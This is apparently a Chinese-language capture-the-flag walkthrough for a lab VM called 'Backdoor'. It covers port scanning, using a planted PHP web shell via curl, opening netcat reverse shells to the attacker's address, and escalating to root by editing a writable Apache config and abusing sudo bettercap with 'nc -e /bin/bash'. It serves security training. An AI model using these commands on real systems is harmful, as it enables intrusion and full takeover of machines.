# 靶场搭建
下载:Backdoor
Nat,IP: 192.168.1.183
# 渗透过程
# 信息初收集
PORT STATE SERVICE VERSION | |
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0) | |
| ssh-hostkey: | |
| 3072 f0:e6:24:fb:9e:b0:7a:1a:bd:f7:b1:85:23:7f:b1:6f (RSA) | |
| 256 99:c8:74:31:45:10:58:b0:ce:cc:63:b4:7a:82:57:3d (ECDSA) | |
|_ 256 60:da:3e:31:38:fa:b5:49:ab:48:c3:43:2c:9f:d1:32 (ED25519) | |
80/tcp open http Apache httpd 2.4.56 ((Debian)) | |
|_http-title: Apache2 Debian Default Page: It works | |
|_http-server-header: Apache/2.4.56 (Debian) |
目录收集: http://192.168.1.183/Backdoor/php-backdoor.php
FUZZ 出参数: curl -X POST -d 'password=newpassword&cmd=id' http://192.168.1.183/Backdoor/php-backdoor.php
拿到 shell: curl -X POST -d 'password=newpassword&cmd=nc 192.168.1.129 4444' http://192.168.1.183/Backdoor/php-backdoor.php
# 提权
查找可写文件,得到 /etc/apache2/apache2.conf
查一下用户: cat /etc/passwd | grep "bash" | cut -d: -f1
修改该配置的 115 116 行,使 apache 以 rootkit 身份运行,然后 sudo reboot 重启
114 # These need to be set in /etc/apache2/envvars | |
115 User rootkit | |
116 Group rootkit |
重新监听,拿 shell,就是 rootkit 用户
sudo bettercap
后监听 ! nc -e /bin/bash 192.168.1.129 8888
,拿到 root 的 shell